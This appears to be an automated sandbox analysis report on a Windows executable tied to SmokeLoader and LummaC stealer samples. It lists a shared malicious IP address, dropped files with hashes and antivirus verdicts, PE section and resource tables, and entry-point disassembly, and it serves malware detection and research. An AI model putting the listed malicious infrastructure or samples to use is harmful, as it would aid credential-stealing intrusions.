 | SecuriteInfo.com.Trojan.DownLoader47.43340.9153.30810.exe | malicious | LummaC | 23.145.40.168
 | file.exe | malicious | LummaC | 23.145.40.168
 | SecuriteInfo.com.Win32.Evo-gen.11282.4102.exe | malicious | LummaC | 23.145.40.168
 | bCnarg2O62.exe | malicious | SmokeLoader | 23.145.40.168
 | 9Y6R8fs0wd.exe | malicious | LummaC | 23.145.40.168
 | file.exe | malicious | LummaC | 23.145.40.168
 | PFW1cgN8EK.exe | malicious | LummaC | 23.145.40.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\B972.exe | bCnarg2O62.exe | malicious | SmokeLoader | 
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 453632
Entropy (8bit): 6.352592573597842
Encrypted: false
SSDEEP: 6144:Xv+T0hUr6WQIzmEpudCnKBzWhI3MLF9hv2Hx+3CtvjUiWElEy6BbO42T8:GYhUr672/gCnMWO8LFzv2RNvjU3NO4O
MD5: 366910063EF4A518B6ADF6D28C7B2C69
SHA1: 2A87028980742C1A86C8B5A356B8F379D4EA23E7
SHA-256: 0DC84955A94A98E04A933E66A3940BDCA12BCA73C41E2EB04D726B0AD28A8256
SHA-512: 0A473FEBB788BDCBBC8791334AC5EF705F5A875111FA9B579154DE5C1CB9A86FC92ABF77B29C7BD4EAA24D1F28C854FF3F4186C29E9FFA915A0F642B19CE3C33
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L....$.e.............................;............@.........................................................................0...x.......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....dilafav............................@..@.heciw..............................@..@.hirezep............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\explorer.exe
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\explorer.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false
                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\explorer.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false
                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\explorer.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\explorer.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: modified
Size (bytes): 78336
Entropy (8bit): 6.394001797252911
Encrypted: false
SSDEEP: 768:WPQkadQWo2lXlxiK/0PJMQ2VGhm9EGFDe8MRDiNfYg9TQRkAuHi5yvaIoFVr1VML:NBfdSKvVwDEhAuBhoL/MnJ0iXD46w0
MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F
SHA1: BA7888FFDB978851F38C4CAC82D58D8CD9A6F077
SHA-256: B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
SHA-512: 938CE106217E9CE98F104AF0913054070C2CC5791DFAA9902540CAEF923579B8DE0AF0ED720753BC40ADC75D7E286ACCDE7198315805331F25BE3F312C23F0BC
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:
• Filename: bCnarg2O62.exe, Detection: malicious
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d......f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...x........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28672
                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):106496
                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):49152
                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):114688
                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:OpenPGP Public Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):290443
                                                                                                                                      Entropy (8bit):7.99935753281566
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:6144:VUQAwuWARRouE1vwyfPJ8+4jxmRPgmkqVizJHw:VfBuRtx6sw
                                                                                                                                      MD5:1F911D56490B86E8D9FE65CF28C3D595
                                                                                                                                      SHA1:787675025A6AB2C2B67C31A5392B4C9C25DDE694
                                                                                                                                      SHA-256:EA2B540BE3FCB3A2708496922EC386928983D5A62355DF219557EA79C7BBFB78
                                                                                                                                      SHA-512:C0D7AF28B7C52B75A9D1F0231F3776B1FD7855CAE26B5DC8EE92A9826E40E551ECBD5BD94E97BAC27396D31D6442940BF975EDAFC210DA42E6EBB0B741436CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.G..;{.xF..M....6..o.xh...I..A.....A.o.......oF.s~;.{.H-..#.....jZ.Z......p.3w.....FA.4.~..>..........F.7.......}.?..d@I<.?.i.2p."..z/.$.C...].Q..>..`......J.....H....u42....ZQ...X..eNg.4.a6....&.'.`.."....%.d.-4..Pk.R\....G.O.S.m..'./G...r.3_...c.b...k..;o..n.....=u.w.....X,.%...sZ{....D5....Z......U.Dr..Wy.m..kRs...?-....MDP.F.y...P..M..8J...#]......D........r9{..w;b.u.....x.h5...q...QP...hq:..x..-..].;x....u.(..xl.g....&-i#.m..yr.....%.Pp..v...dD.....k:......1+.......jR.Y..@..$..m....>+8..\.s...j...RH0...E.mu(..C....0...`7.}..p.7M.....$*...SA....;;.L...|....>.`..k.*....!'8...hI.....".W.v .B.yn...Y....n.1..B.p....O.~.._.K._.2..==M,S.h.5..H....X.."..V..&..y..D....L..Y+...S.bm..&.%....2o...3.C...T...I..._..T.9G].0n.a2.(.......?.d......oS......s.|.!.m.l....|_{."q..........4B.t./dr...j.'kU.X.....@).........B+H..M.s.F.k...q....F...g........zv......................sXfk..3....p..V.....N.j..Z.r.L..N.e.bo#...i..o....8..{.....j...(K.&...j;.t
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):453632
                                                                                                                                      Entropy (8bit):6.352592573597842
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Xv+T0hUr6WQIzmEpudCnKBzWhI3MLF9hv2Hx+3CtvjUiWElEy6BbO42T8:GYhUr672/gCnMWO8LFzv2RNvjU3NO4O
                                                                                                                                      MD5:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      SHA1:2A87028980742C1A86C8B5A356B8F379D4EA23E7
                                                                                                                                      SHA-256:0DC84955A94A98E04A933E66A3940BDCA12BCA73C41E2EB04D726B0AD28A8256
                                                                                                                                      SHA-512:0A473FEBB788BDCBBC8791334AC5EF705F5A875111FA9B579154DE5C1CB9A86FC92ABF77B29C7BD4EAA24D1F28C854FF3F4186C29E9FFA915A0F642B19CE3C33
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L....$.e.............................;............@.........................................................................0...x.......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....dilafav............................@..@.heciw..............................@..@.hirezep............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):454144
                                                                                                                                      Entropy (8bit):6.35347986015949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:bTOLX6UHRWxXKNneVtVD/Gn9meVgd4w3sGz7A8gVy6BbO42T8:+r6UHoxaNneVtV5jz8s4NO4O
                                                                                                                                      MD5:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      SHA1:EF3BCDFBC99CA65CF6AE2B550DA3B9C4451DB2A7
                                                                                                                                      SHA-256:BA8FCBECAF19E5DA453AAFBCB716C6BA46980D64AD1C86CE17CEE7426C042BCC
                                                                                                                                      SHA-512:937EC056B76048653D1D2A8151B89551D1DFFFEC212177686DB6000104825397B1B97A9B153FB137A3C83FB53AFC3FC2810A1D4CD3663CF12EF34F5E6C41277A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L.....cd.............................;............@.................................I...........................................x...................................X...............................h...@............................................text............................... ..`.rdata..r...........................@..@.data............`..................@....saxaxi.............................@..@.losucu.............................@..@.rasiye.............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):6.35347986015949
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:ctMI3TYXpX.exe
File size: 454'144 bytes
MD5: a27775738faff754dcf5c3e8e42b9838
SHA1: ef3bcdfbc99ca65cf6ae2b550da3b9c4451db2a7
SHA256: ba8fcbecaf19e5da453aafbcb716c6ba46980d64ad1c86ce17cee7426c042bcc
SHA512: 937ec056b76048653d1d2a8151b89551d1dfffec212177686db6000104825397b1b97a9b153fb137a3c83fb53afc3fc2810a1d4cd3663cf12ef34f5e6c41277a
SSDEEP: 6144:bTOLX6UHRWxXKNneVtVD/Gn9meVgd4w3sGz7A8gVy6BbO42T8:+r6UHoxaNneVtV5jz8s4NO4O
TLSH: 53A4B00256F9AEA0F5F246328D2DF6E8A56DFC51EE58E757325CEB1F1B701A0C222311
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L.....cd...................
Icon Hash: 45254945454d410d
Entrypoint: 0x403bf9
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64639EA7 [Tue May 16 15:17:59 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: cf2df69e8bb6acbf3b231da2c6f4bda2
Instruction
call 00007FAB8881EFA9h
jmp 00007FAB8881BEFEh
push dword ptr [00451258h]
call dword ptr [0040F12Ch]
test eax, eax
je 00007FAB8881C074h
call eax
push 00000019h
call 00007FAB8881E88Bh
push 00000001h
push 00000000h
call 00007FAB8881B830h
add esp, 0Ch
jmp 00007FAB8881B7F5h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040F3C0h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FAB8881C07Eh
test byte ptr [eax], 00000008h
je 00007FAB8881C079h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [0040F160h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
Programming Language:
• [ASM] VS2010 build 30319
• [C++] VS2010 build 30319
• [ C ] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [RES] VS2010 build 30319
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x49ae0 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1f108 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x49b58 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x49068 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x1fc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xd4dd | 0xd600 | c643eea5aef12fcfd7be843cbfe6445e | False | 0.6018910630841121 | data | 6.671297397200401 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xf000 | 0x3b672 | 0x3b800 | ee8e72efdf963d859c9aeaa4ae95d831 | False | 0.7518546481092437 | data | 6.868582189296561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4b000 | 0x11cc0 | 0x6000 | 31f5596484b4beb598ad2843fc87cb5b | False | 0.0838623046875 | data | 1.091277368418054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.saxaxi | 0x5d000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.losucu | 0x5e000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rasiye | 0x5f000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x1f108 | 0x1f200 | ed98b720f1c3ff3a2761a26875f38bf5 | False | 0.4244791666666667 | data | 5.043758495644137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x79b78 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706
RT_CURSOR | 0x79ea8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316
RT_CURSOR | 0x7a000 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
RT_CURSOR | 0x7aea8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
RT_CURSOR | 0x7b750 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
RT_CURSOR | 0x7bce8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
RT_CURSOR | 0x7cb90 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
RT_CURSOR | 0x7d438 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
RT_ICON | 0x60ac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3694029850746269
RT_ICON | 0x60ac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3694029850746269
RT_ICON | 0x61968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.4553249097472924
RT_ICON | 0x61968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.4553249097472924
RT_ICON | 0x62210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.4619815668202765
RT_ICON | 0x62210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.4619815668202765
RT_ICON | 0x628d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.4552023121387283
RT_ICON | 0x628d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.4552023121387283
RT_ICON | 0x62e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.2682572614107884
RT_ICON | 0x62e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.2682572614107884
RT_ICON | 0x653e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.3074577861163227
RT_ICON | 0x653e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.3074577861163227
RT_ICON | 0x66490 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3599290780141844
RT_ICON | 0x66490 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3599290780141844
RT_ICON | 0x66960 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.5690298507462687
RT_ICON | 0x66960 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.5690298507462687
RT_ICON | 0x67808 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5473826714801444
RT_ICON | 0x67808 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5473826714801444
RT_ICON | 0x680b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.6163294797687862
RT_ICON | 0x680b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.6163294797687862
RT_ICON | 0x68618 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4631742738589212
RT_ICON | 0x68618 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4631742738589212
RT_ICON | 0x6abc0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.4873358348968105
RT_ICON | 0x6abc0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.4873358348968105
